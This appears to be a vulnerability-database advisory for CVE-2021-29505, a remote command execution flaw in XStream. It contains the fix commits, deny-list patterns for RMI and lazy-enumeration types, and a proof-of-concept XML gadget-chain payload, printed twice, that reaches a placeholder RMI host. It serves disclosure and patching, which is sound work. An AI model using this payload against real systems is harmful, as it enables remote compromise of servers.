High severityNVD Advisory· Published May 28, 2021· Updated May 29, 2025

XStream is vulnerable to a Remote Command Execution attack

CVE-2021-29505

Description

XStream is software for serializing Java objects to XML and back again. A vulnerability in XStream versions prior to 1.4.17 may allow a remote attacker has sufficient rights to execute commands of the host only by manipulating the processed input stream. No user who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types is affected. The vulnerability is patched in version 1.4.17.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

XStream versions prior to 1.4.17 allow remote command execution via a crafted XML input stream when no security whitelist is configured.

Vulnerability

XStream versions prior to 1.4.17 are vulnerable to a remote command execution (RCE) attack. The vulnerability resides in the unmarshalling process where type information in the XML stream is used to recreate objects. An attacker can manipulate the input stream to inject malicious objects that trigger execution of arbitrary commands on the host. Users who have configured XStream's security framework with a whitelist limited to minimal required types are not affected. [1][2][3][4]

Exploitation

An attacker needs the ability to supply a crafted XML input to XStream's unmarshalling process. No authentication is required if the application accepts untrusted XML. The exploit involves replacing a marshalled PriorityQueue XML with a specially crafted payload that uses classes like javax.naming.ldap.Rdn_-RdnEntry and com.sun.org.apache.xpath.internal.objects.XString to achieve command execution. The steps are: marshal a simple PriorityQueue to XML, replace the XML with the malicious snippet, and unmarshal it with XStream. [2][3][4]

Impact

Successful exploitation allows a remote attacker to execute arbitrary commands on the server with the privileges of the XStream process. This can lead to full compromise of the host, including data exfiltration, installation of malware, or further lateral movement. The impact is high (CVSS 9.8 critical) due to the potential for remote code execution without user interaction. [1]

Mitigation

The vulnerability is patched in XStream version 1.4.17. Users should upgrade immediately. As a workaround, users can configure XStream's security framework with a whitelist that limits allowed types to the minimal required set. No other workarounds are available. The CVE is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog as of the publication date. [1][2][3][4]

References

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package	Affected versions	Patched versions
com.thoughtworks.xstream:xstreamMaven	< 1.4.17	1.4.17

Affected products

ghsa-coords5 versions
pkg:maven/com.thoughtworks.xstream/xstream pkg:rpm/suse/xstream&distro=SUSE%20Linux%20Enterprise%20Module%20for%20Development%20Tools%2015%20SP2 pkg:rpm/suse/xstream&distro=SUSE%20Linux%20Enterprise%20Module%20for%20Development%20Tools%2015%20SP3 pkg:rpm/suse/xstream&distro=SUSE%20Manager%20Server%20Module%204.1 pkg:rpm/suse/xstream&distro=SUSE%20Manager%20Server%20Module%204.2
< 1.4.17+ 4 more
- (no CPE)range: < 1.4.17
- (no CPE)range: < 1.4.17-3.11.2
- (no CPE)range: < 1.4.17-3.11.2
- (no CPE)range: < 1.4.17-3.11.2
- (no CPE)range: < 1.4.17-3.11.2
x-stream/xstreamv5
Range: < 1.4.17

Patches

24fac8219129

Add description of CVE-2021-29505 and bug fix.

https://github.com/x-stream/xstreamjoehniMay 10, 2021via ghsa

commit

4 files changed · +152 −5

xstream-distribution/src/content/changes.html+17 −2 modified

@@ -101,11 +101,26 @@ <h2>Stream compatibility</h2>
 		<li>No support for Hibernate 3 collections.</li>
 	</ul>
 
-<!--
 	<h1 id="upcoming-1.4.x">Upcoming 1.4.x maintenance release</h1>
 
 	<p>Not yet released.</p>
--->
+
+	<p class="highlight">This maintenance release addresses the security vulnerability
+	<a href="CVE-2020-26258.html">CVE-2021-29505</a>, when unmarshalling with XStream instances using an uninitialized
+	security framework.</p>
+
+	<h2>Stream compatibility</h2>
+
+	<ul>
+		<li>The following types are now blacklisted by default and the deserialization
+		of XML containing one of the two types will fail.  You will have to enable these types by explicit
+		configuration, if you need them:<br>
+			<ul>
+				<li>any type in the java.rmi.* and sun.rmi.* package hierarchies</li>
+				<li>the individual type com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl</li>
+			</ul>
+		</li>
+	</ul>
 
 	<h1 id="1.4.16">1.4.16</h1>

xstream-distribution/src/content/CVE-2021-29505.html+119 −0 added

@@ -0,0 +1,119 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+ 
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+ 
+ Created on 8. May 2021 by Joerg Schaible
+ -->
+  <head>
+    <title>CVE-2021-29505</title>
+  </head>
+  <body>
+
+    <h2 id="vulnerability">Vulnerability</h2>
+    
+    <p>CVE-2021-29505: XStream is vulnerable to a Remote Command Execution attack.</p>
+	
+    <h2 id="affected_versions">Affected Versions</h2>
+    
+	<p>All versions until and including version 1.4.16 are affected, if using the version out of the box. No user is
+	affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+	framework</a> with a whitelist limited to the minimal required types.</p>
+
+    <h2 id="description">Description</h2>
+    
+    <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+    XStream creates therefore new instances based on these type information.  An attacker can manipulate the processed
+    input stream and replace or inject objects, that result in execution of a local command on the server.</p>
+
+    <h2 id="reproduction">Steps to Reproduce</h2>
+
+	<p>Create a simple PriorityQueue and use XStream to marshal it to XML.  Replace the XML with following snippet and
+	unmarshal it again with XStream:</p>
+<div class="Source XML"><pre>&lt;java.util.PriorityQueue serialization='custom'&gt;
+  &lt;unserializable-parents/&gt;
+  &lt;java.util.PriorityQueue&gt;
+    &lt;default&gt;
+      &lt;size&gt;2&lt;/size&gt;
+    &lt;/default&gt;
+    &lt;int&gt;3&lt;/int&gt;
+    &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
+      &lt;type&gt;12345&lt;/type&gt;
+      &lt;value class='com.sun.org.apache.xpath.internal.objects.XString'&gt;
+        &lt;m__obj class='string'&gt;com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: &lt;none&gt;&lt;/m__obj&gt;
+      &lt;/value&gt;
+    &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
+    &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
+      &lt;type&gt;12345&lt;/type&gt;
+      &lt;value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'&gt;
+        &lt;message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'&gt;
+          &lt;parsedMessage&gt;true&lt;/parsedMessage&gt;
+          &lt;soapVersion&gt;SOAP_11&lt;/soapVersion&gt;
+          &lt;bodyParts/&gt;
+          &lt;sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'&gt;
+            &lt;attachmentsInitialized&gt;false&lt;/attachmentsInitialized&gt;
+            &lt;multiPart class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'&gt;
+              &lt;soapPart/&gt;
+              &lt;mm&gt;
+                &lt;it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'&gt;
+                  &lt;aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'&gt;
+                    &lt;candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'&gt;
+                      &lt;names&gt;
+                        &lt;string&gt;aa&lt;/string&gt;
+                        &lt;string&gt;aa&lt;/string&gt;
+                      &lt;/names&gt;
+                      &lt;ctx&gt;
+                        &lt;environment/&gt;
+                        &lt;registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'&gt;
+                          &lt;java.rmi.server.RemoteObject&gt;
+                            &lt;string&gt;UnicastRef&lt;/string&gt;
+                            &lt;string&gt;ip2&lt;/string&gt;
+                            &lt;int&gt;1099&lt;/int&gt;
+                            &lt;long&gt;0&lt;/long&gt;
+                            &lt;int&gt;0&lt;/int&gt;
+                            &lt;short&gt;0&lt;/short&gt;
+                            &lt;boolean&gt;false&lt;/boolean&gt;
+                          &lt;/java.rmi.server.RemoteObject&gt;
+                        &lt;/registry&gt;
+                        &lt;host&gt;ip2&lt;/host&gt;
+                        &lt;port&gt;1099&lt;/port&gt;
+                      &lt;/ctx&gt;
+                    &lt;/candidates&gt;
+                  &lt;/aliases&gt;
+                &lt;/it&gt;
+              &lt;/mm&gt;
+            &lt;/multiPart&gt;
+          &lt;/sm&gt;
+        &lt;/message&gt;
+      &lt;/value&gt;
+    &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
+  &lt;/java.util.PriorityQueue&gt;
+&lt;/java.util.PriorityQueue&gt;
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+    <p>As soon as the XML gets unmarshalled, the payload gets executed and the command is executed on the host.</p>
+
+    <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+    <h2 id="impact">Impact</h2>
+
+	<p>The vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by
+	manipulating the processed input stream.</p>
+
+    <h2 id="workarounds">Workarounds</h2>
+
+    <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+    <h2 id="credits">Credits</h2>
+    
+    <p>V3geB1rd, white hat hacker from Tencent Security Response Center found and reported the issue to XStream and provided the required information to reproduce it.</p>
+    
+  	</body>
+ </html>

xstream-distribution/src/content/security.html+15 −3 modified

@@ -44,11 +44,20 @@ <h2 id="CVEs">Documented Vulnerabilities</h2>
     Exposure (CVE) system managed by the <a href="http://www.mitre.org/">Mitre Corporation</a>. Following a list of the
     reported vulnerabilities for the different versions:</p>
     
-    <table summary="Table of reported vulnerabilities daocumented as CVE">
+    <table summary="Table of reported vulnerabilities documented as CVE">
       <tr>
         <th>CVE</th>
         <th>Description</th>
       </tr>
+      <tr>
+        <th>Version 1.4.16</th>
+        <td></td>
+        <td></td>
+      </tr>
+      <tr>
+        <th><a href="CVE-2021-29505.html">CVE-2021-29505</a></th>
+        <td>XStream is vulnerable to a Remote Command Execution attack.</td>
+      </tr>
       <tr>
         <th>Version 1.4.15</th>
         <td></td>
@@ -393,16 +402,19 @@ <h2 id="workaround">Workarounds for older XStream versions</h2>
 <div class="Source Java"><pre>XStream xstream = new XStream();
 // add your allowed types, type hierarchies or packages here
 </pre></div>
-    <p>Users of XStream 1.4.14 who insist to use XStream default blacklist - despite that clear recommendation - can
+    <p>Users of XStream 1.4.16 who insist to use XStream default blacklist - despite that clear recommendation - can
     add these lines to XStream's setup code:</p>
+<div class="Source Java"><pre>xstream.denyTypesByRegExp(new String[]{ ".*\\.Lazy(?:Search)?Enumeration.*", "(?:java|sun)\\.rmi\\..*" });
+</pre></div>
+    <p>Users of XStream 1.4.15 should <strong>additionally</strong> add these lines to the lines from above:</p>
 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "sun.awt.datatransfer.DataTransferer$IndexOrderComparator", "sun.swing.SwingLazyValue", "com.sun.corba.se.impl.activation.ServerTableEntry", "com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator" });
 xstream.denyTypesByRegExp(new String[]{ ".*\\$ServiceNameIterator", "javafx\\.collections\\.ObservableList\\$.*", ".*\\.bcel\\..*\\.util\\.ClassLoader" });
 xstream.denyTypeHierarchy(java.io.InputStream.class );
 xstream.denyTypeHierarchy(java.nio.channels.Channel.class );
 xstream.denyTypeHierarchy(javax.activation.DataSource.class );
 xstream.denyTypeHierarchy(javax.sql.rowset.BaseRowSet.class );
 </pre></div>
-    <p>Users of XStream 1.4.13 should <strong>additionally</strong> add these two lines to the lines from above:</p>
+    <p>Users of XStream 1.4.14 and 1.4.13 should <strong>additionally</strong> add these two lines to the lines from above:</p>
 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" });
 xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
 </pre></div>

xstream-distribution/src/content/website.xml+1 −0 modified

@@ -74,6 +74,7 @@
         <page>CVE-2021-21349.html</page>
         <page>CVE-2021-21350.html</page>
         <page>CVE-2021-21351.html</page>
+        <page>CVE-2021-29505.html</page>
         <page>CVE-2020-26217.html</page>
         <page>CVE-2020-26258.html</page>
         <page>CVE-2020-26259.html</page>

f0c4a8d861b6

Add description of CVE-2021-29505 and bug fix.

https://github.com/x-stream/xstreamjoehniMay 10, 2021via ghsa

commit

5 files changed · +156 −7

xstream-distribution/src/content/changes.html+17 −2 modified

@@ -28,11 +28,26 @@
 		filter for the appropriate milestone.
 	</p>
 
-<!--
 	<h1 id="upcoming-1.4.x">Upcoming 1.4.x maintenance release</h1>
 
 	<p>Not yet released.</p>
--->
+
+	<p class="highlight">This maintenance release addresses the security vulnerability
+	<a href="CVE-2020-26258.html">CVE-2021-29505</a>, when unmarshalling with XStream instances using an uninitialized
+	security framework.</p>
+
+	<h2>Stream compatibility</h2>
+
+	<ul>
+		<li>The following types are now blacklisted by default and the deserialization
+		of XML containing one of the two types will fail.  You will have to enable these types by explicit
+		configuration, if you need them:<br>
+			<ul>
+				<li>any type in the java.rmi.* and sun.rmi.* package hierarchies</li>
+				<li>the individual type com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl</li>
+			</ul>
+		</li>
+	</ul>
 
 	<h1 id="1.4.16">1.4.16</h1>

xstream-distribution/src/content/CVE-2021-29505.html+119 −0 added

@@ -0,0 +1,119 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+ 
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+ 
+ Created on 8. May 2021 by Joerg Schaible
+ -->
+  <head>
+    <title>CVE-2021-29505</title>
+  </head>
+  <body>
+
+    <h2 id="vulnerability">Vulnerability</h2>
+    
+    <p>CVE-2021-29505: XStream is vulnerable to a Remote Command Execution attack.</p>
+	
+    <h2 id="affected_versions">Affected Versions</h2>
+    
+	<p>All versions until and including version 1.4.16 are affected, if using the version out of the box. No user is
+	affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+	framework</a> with a whitelist limited to the minimal required types.</p>
+
+    <h2 id="description">Description</h2>
+    
+    <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+    XStream creates therefore new instances based on these type information.  An attacker can manipulate the processed
+    input stream and replace or inject objects, that result in execution of a local command on the server.</p>
+
+    <h2 id="reproduction">Steps to Reproduce</h2>
+
+	<p>Create a simple PriorityQueue and use XStream to marshal it to XML.  Replace the XML with following snippet and
+	unmarshal it again with XStream:</p>
+<div class="Source XML"><pre>&lt;java.util.PriorityQueue serialization='custom'&gt;
+  &lt;unserializable-parents/&gt;
+  &lt;java.util.PriorityQueue&gt;
+    &lt;default&gt;
+      &lt;size&gt;2&lt;/size&gt;
+    &lt;/default&gt;
+    &lt;int&gt;3&lt;/int&gt;
+    &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
+      &lt;type&gt;12345&lt;/type&gt;
+      &lt;value class='com.sun.org.apache.xpath.internal.objects.XString'&gt;
+        &lt;m__obj class='string'&gt;com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: &lt;none&gt;&lt;/m__obj&gt;
+      &lt;/value&gt;
+    &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
+    &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
+      &lt;type&gt;12345&lt;/type&gt;
+      &lt;value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'&gt;
+        &lt;message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'&gt;
+          &lt;parsedMessage&gt;true&lt;/parsedMessage&gt;
+          &lt;soapVersion&gt;SOAP_11&lt;/soapVersion&gt;
+          &lt;bodyParts/&gt;
+          &lt;sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'&gt;
+            &lt;attachmentsInitialized&gt;false&lt;/attachmentsInitialized&gt;
+            &lt;multiPart class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'&gt;
+              &lt;soapPart/&gt;
+              &lt;mm&gt;
+                &lt;it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'&gt;
+                  &lt;aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'&gt;
+                    &lt;candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'&gt;
+                      &lt;names&gt;
+                        &lt;string&gt;aa&lt;/string&gt;
+                        &lt;string&gt;aa&lt;/string&gt;
+                      &lt;/names&gt;
+                      &lt;ctx&gt;
+                        &lt;environment/&gt;
+                        &lt;registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'&gt;
+                          &lt;java.rmi.server.RemoteObject&gt;
+                            &lt;string&gt;UnicastRef&lt;/string&gt;
+                            &lt;string&gt;ip2&lt;/string&gt;
+                            &lt;int&gt;1099&lt;/int&gt;
+                            &lt;long&gt;0&lt;/long&gt;
+                            &lt;int&gt;0&lt;/int&gt;
+                            &lt;short&gt;0&lt;/short&gt;
+                            &lt;boolean&gt;false&lt;/boolean&gt;
+                          &lt;/java.rmi.server.RemoteObject&gt;
+                        &lt;/registry&gt;
+                        &lt;host&gt;ip2&lt;/host&gt;
+                        &lt;port&gt;1099&lt;/port&gt;
+                      &lt;/ctx&gt;
+                    &lt;/candidates&gt;
+                  &lt;/aliases&gt;
+                &lt;/it&gt;
+              &lt;/mm&gt;
+            &lt;/multiPart&gt;
+          &lt;/sm&gt;
+        &lt;/message&gt;
+      &lt;/value&gt;
+    &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
+  &lt;/java.util.PriorityQueue&gt;
+&lt;/java.util.PriorityQueue&gt;
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+    <p>As soon as the XML gets unmarshalled, the payload gets executed and the command is executed on the host.</p>
+
+    <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+    <h2 id="impact">Impact</h2>
+
+	<p>The vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by
+	manipulating the processed input stream.</p>
+
+    <h2 id="workarounds">Workarounds</h2>
+
+    <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+    <h2 id="credits">Credits</h2>
+    
+    <p>V3geB1rd, white hat hacker from Tencent Security Response Center found and reported the issue to XStream and provided the required information to reproduce it.</p>
+    
+  	</body>
+ </html>

xstream-distribution/src/content/security.html+15 −3 modified

@@ -44,11 +44,20 @@ <h2 id="CVEs">Documented Vulnerabilities</h2>
     Exposure (CVE) system managed by the <a href="http://www.mitre.org/">Mitre Corporation</a>. Following a list of the
     reported vulnerabilities for the different versions:</p>
     
-    <table summary="Table of reported vulnerabilities daocumented as CVE">
+    <table summary="Table of reported vulnerabilities documented as CVE">
       <tr>
         <th>CVE</th>
         <th>Description</th>
       </tr>
+      <tr>
+        <th>Version 1.4.16</th>
+        <td></td>
+        <td></td>
+      </tr>
+      <tr>
+        <th><a href="CVE-2021-29505.html">CVE-2021-29505</a></th>
+        <td>XStream is vulnerable to a Remote Command Execution attack.</td>
+      </tr>
       <tr>
         <th>Version 1.4.15</th>
         <td></td>
@@ -378,16 +387,19 @@ <h2 id="workaround">Workarounds for older XStream versions</h2>
 XStream.setupDefaultSecurity(xstream);
 // add your allowed types, type hierarchies or packages here
 </pre></div>
-    <p>Users of XStream 1.4.14 who insist to use XStream default blacklist - despite that clear recommendation - can
+    <p>Users of XStream 1.4.16 who insist to use XStream default blacklist - despite that clear recommendation - can
     add these lines to XStream's setup code:</p>
+<div class="Source Java"><pre>xstream.denyTypesByRegExp(new String[]{ ".*\\.Lazy(?:Search)?Enumeration.*", "(?:java|sun)\\.rmi\\..*" });
+</pre></div>
+    <p>Users of XStream 1.4.15 should <strong>additionally</strong> add these lines to the lines from above:</p>
 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "sun.awt.datatransfer.DataTransferer$IndexOrderComparator", "sun.swing.SwingLazyValue", "com.sun.corba.se.impl.activation.ServerTableEntry", "com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator" });
 xstream.denyTypesByRegExp(new String[]{ ".*\\$ServiceNameIterator", "javafx\\.collections\\.ObservableList\\$.*", ".*\\.bcel\\..*\\.util\\.ClassLoader" });
 xstream.denyTypeHierarchy(java.io.InputStream.class );
 xstream.denyTypeHierarchy(java.nio.channels.Channel.class );
 xstream.denyTypeHierarchy(javax.activation.DataSource.class );
 xstream.denyTypeHierarchy(javax.sql.rowset.BaseRowSet.class );
 </pre></div>
-    <p>Users of XStream 1.4.13 should <strong>additionally</strong> add these two lines to the lines from above:</p>
+    <p>Users of XStream 1.4.14 and 1.4.13 should <strong>additionally</strong> add these two lines to the lines from above:</p>
 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" });
 xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
 </pre></div>

xstream-distribution/src/content/website.xml+1 −0 modified

@@ -74,6 +74,7 @@
         <page>CVE-2021-21349.html</page>
         <page>CVE-2021-21350.html</page>
         <page>CVE-2021-21351.html</page>
+        <page>CVE-2021-29505.html</page>
         <page>CVE-2020-26217.html</page>
         <page>CVE-2020-26258.html</page>
         <page>CVE-2020-26259.html</page>

xstream/src/java/com/thoughtworks/xstream/XStream.java+4 −2 modified

@@ -336,11 +336,13 @@ public class XStream {
     private static final Pattern IGNORE_ALL = Pattern.compile(".*");
     private static final Pattern GETTER_SETTER_REFLECTION = Pattern.compile(".*\\$GetterSetterReflection");
     private static final Pattern PRIVILEGED_GETTER = Pattern.compile(".*\\$PrivilegedGetter");
+    private static final Pattern LAZY_ENUMERATORS = Pattern.compile(".*\\.Lazy(?:Search)?Enumeration.*");
     private static final Pattern LAZY_ITERATORS = Pattern.compile(".*\\$LazyIterator");
     private static final Pattern JAXWS_ITERATORS = Pattern.compile(".*\\$ServiceNameIterator");
     private static final Pattern JAVAFX_OBSERVABLE_LIST__ = Pattern.compile(
         "javafx\\.collections\\.ObservableList\\$.*");
     private static final Pattern JAVAX_CRYPTO = Pattern.compile("javax\\.crypto\\..*");
+    private static final Pattern JAVA_RMI = Pattern.compile("(?:java|sun)\\.rmi\\..*");
     private static final Pattern BCEL_CL = Pattern.compile(".*\\.bcel\\..*\\.util\\.ClassLoader");
 
     /**
@@ -657,8 +659,8 @@ protected void setupSecurity() {
             "sun.awt.datatransfer.DataTransferer$IndexOrderComparator", //
             "sun.swing.SwingLazyValue"});
         denyTypesByRegExp(new Pattern[]{
-            LAZY_ITERATORS, GETTER_SETTER_REFLECTION, PRIVILEGED_GETTER, JAVAX_CRYPTO, JAXWS_ITERATORS,
-            JAVAFX_OBSERVABLE_LIST__, BCEL_CL});
+            LAZY_ITERATORS, LAZY_ENUMERATORS, GETTER_SETTER_REFLECTION, PRIVILEGED_GETTER, JAVA_RMI, JAVAX_CRYPTO,
+            JAXWS_ITERATORS, JAVAFX_OBSERVABLE_LIST__, BCEL_CL});
         denyTypeHierarchy(InputStream.class);
         denyTypeHierarchyDynamically("java.nio.channels.Channel");
         denyTypeHierarchyDynamically("javax.activation.DataSource");

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

github.com/advisories/GHSA-7chv-rrw6-w6fcghsaADVISORY
nvd.nist.gov/vuln/detail/CVE-2021-29505ghsaADVISORY
github.com/x-stream/xstream/commit/24fac82191292c6ae25f94508d28b9823f83624fghsax_refsource_MISCWEB
github.com/x-stream/xstream/commit/f0c4a8d861b68ffc3119cfbbbd632deee624e227ghsax_refsource_MISCWEB
github.com/x-stream/xstream/security/advisories/GHSA-7chv-rrw6-w6fcghsax_refsource_CONFIRMWEB
lists.apache.org/thread.html/r8ee51debf7fd184b6a6b020dc31df25118b0aa612885f12fbe77f04f%40%3Cdev.jmeter.apache.org%3EghsaWEB
lists.apache.org/thread.html/r8ee51debf7fd184b6a6b020dc31df25118b0aa612885f12fbe77f04f@%3Cdev.jmeter.apache.org%3Eghsax_refsource_MISCWEB
lists.debian.org/debian-lts-announce/2021/07/msg00004.htmlghsax_refsource_MISCWEB
lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHPghsaWEB
lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7ghsaWEB
lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREBghsaWEB
lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHPghsax_refsource_MISCWEB
lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7ghsax_refsource_MISCWEB
lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREBghsax_refsource_MISCWEB
security.netapp.com/advisory/ntap-20210708-0007ghsax_refsource_MISCWEB
www.debian.org/security/2021/dsa-5004ghsax_refsource_MISCWEB
www.oracle.com/security-alerts/cpuapr2022.htmlghsax_refsource_MISCWEB
www.oracle.com/security-alerts/cpujan2022.htmlghsax_refsource_MISCWEB
www.oracle.com/security-alerts/cpujul2022.htmlghsax_refsource_MISCWEB
www.oracle.com/security-alerts/cpuoct2021.htmlghsax_refsource_MISCWEB
x-stream.github.io/CVE-2021-29505.htmlghsax_refsource_MISCWEB

News mentions

No linked articles in our index yet.

cvss	0.455
epss	0.072
exploit	0.000
kev	0.000
patch	-0.070
ransomware	0.000